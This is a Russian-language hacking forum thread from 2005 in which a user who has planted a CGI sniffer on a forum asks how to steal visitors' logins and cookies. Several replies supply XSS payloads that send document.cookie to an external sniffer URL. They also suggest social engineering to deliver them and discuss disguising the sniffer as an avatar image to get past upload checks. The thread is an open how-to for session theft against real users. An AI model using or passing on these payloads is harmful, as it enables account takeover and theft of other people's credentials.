ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Как использовать cgi-снифферы?
  #1  
Старый 05.12.2005, 16:29
Аватар для ZetRoX
ZetRoX
Познающий
Регистрация: 04.12.2005
Сообщений: 52
Провел на форуме:
184032

Репутация: 1
По умолчанию Как использовать cgi-снифферы?

Привет всем, кто здесь присутствует.

Прошу совет, что делать дельше...
Я поставил сниффер с http://www.s.netsec.ru/ на один форум....кто-то нажал на мою фотку и у меня повились строки с IP адресом, ссылкой из какого топа пришли и время....а что надо дальше сделать, чтобы узнать логин и пароль этого счастливчика???
или cookie....

жду ответа, заранее благодарен.
____________________________
 
Ответить с цитированием

  #2  
Старый 05.12.2005, 16:35
Аватар для dinar_007
dinar_007
Флудер
Регистрация: 18.01.2005
Сообщений: 2,298
Провел на форуме:
13936387

Репутация: 1844


Отправить сообщение для dinar_007 с помощью ICQ
По умолчанию

А для этого нужен какой-нибудь скрипт, который ворует куки или тег )))
 
Ответить с цитированием

  #3  
Старый 05.12.2005, 16:40
Аватар для bul666
bul666
Banned
Регистрация: 21.04.2005
Сообщений: 328
Провел на форуме:
632524

Репутация: 9
Отправить сообщение для bul666 с помощью ICQ
По умолчанию

например если сниффер JPG, то <script>var img=new IMG(); img.src="sniffer/s.jpg"+document.cookie;</script> Или ченит типа этого ))
 
Ответить с цитированием

  #4  
Старый 05.12.2005, 17:41
Аватар для qBiN
qBiN
Постоянный
Регистрация: 20.01.2005
Сообщений: 899
Провел на форуме:
1535446

Репутация: 182


Отправить сообщение для qBiN с помощью ICQ
По умолчанию

найди xss уязвимость если пассивная то можно с помощью СИ(фреймы,или прямую ссылку это зависит от твоего воображения и опыта в СИ) если активная,то там на порядок проще.
Код который нужно вставлять тебе уже привели,другие примеры скрипта ворующего куки можно поглядеть на antichat.ru
 
Ответить с цитированием

  #5  
Старый 05.12.2005, 21:16
Аватар для qBiN
qBiN
Постоянный
Регистрация: 20.01.2005
Сообщений: 899
Провел на форуме:
1535446

Репутация: 182


Отправить сообщение для qBiN с помощью ICQ
По умолчанию

Давайте из темы не будем делать флейм,все что не по теме (а у нас она про cgi снифферы) щас сотру.
 
Ответить с цитированием

  #6  
Старый 30.12.2005, 16:43
Аватар для ZetRoX
ZetRoX
Познающий
Регистрация: 04.12.2005
Сообщений: 52
Провел на форуме:
184032

Репутация: 1
По умолчанию

Прошу прощения, напишите мне плиз скрипт, чтобы его можно было во Flash вставить...
ну короче говоря...есть Flash сайт....мне надо сделать так, чтобы при кликанье ссылки на мой сниф приходили куки...вот и всё....в ссылку могу вписать Java Script, FS Command, Action Script ну или ссылку на страницу....прошу напишите для чего-нить из этого скрипт....

мой снифф http://s.netsec.ru/ZetRoX/pic.gif
 
Ответить с цитированием

  #7  
Старый 31.12.2005, 16:46
Аватар для CTTAPTAK
CTTAPTAK
Познающий
Регистрация: 09.10.2005
Сообщений: 44
Провел на форуме:
101073

Репутация: 5
По умолчанию

обычно юзается скрипт <script>img=new Image(); img.src="http://s.netsec.ru/ZetRoX/pic.gif?;"+document.cookie;</script>

у меня встречный вопрос:
Как указать в скрипте размер картинки? (чтоб форум не противился принятию как аватар) требуется размер 100*100
 
Ответить с цитированием

  #8  
Старый 31.12.2005, 17:01
Аватар для ZetRoX
ZetRoX
Познающий
Регистрация: 04.12.2005
Сообщений: 52
Провел на форуме:
184032

Репутация: 1
По умолчанию

я знаю, что этот скрипт, но он нефига не работает даже на самом себе проверял....
 
Ответить с цитированием

  #9  
Старый 31.12.2005, 17:18
Аватар для CTTAPTAK
CTTAPTAK
Познающий
Регистрация: 09.10.2005
Сообщений: 44
Провел на форуме:
101073

Репутация: 5
По умолчанию

он работает но чтоб он работал на всяких форумах/порталах надо каким то образом сделать чтоб аплоадеры распоновали как ЖэПэГэшку с размерами 100*100
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Кто пробовал использовать уязвимости беспроводных сетей? $h@dow Болталка 4 24.09.2005 04:30
как использовать ворованный кукис??? Rolik E-Mail 10 21.05.2005 00:47
Сетевой сканер Nmap. Руководство пользователя foreva Чужие Статьи 1 08.02.2005 16:36
Как использовать cross-site scripting (css) foreva Чужие Статьи 0 06.02.2005 19:03



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ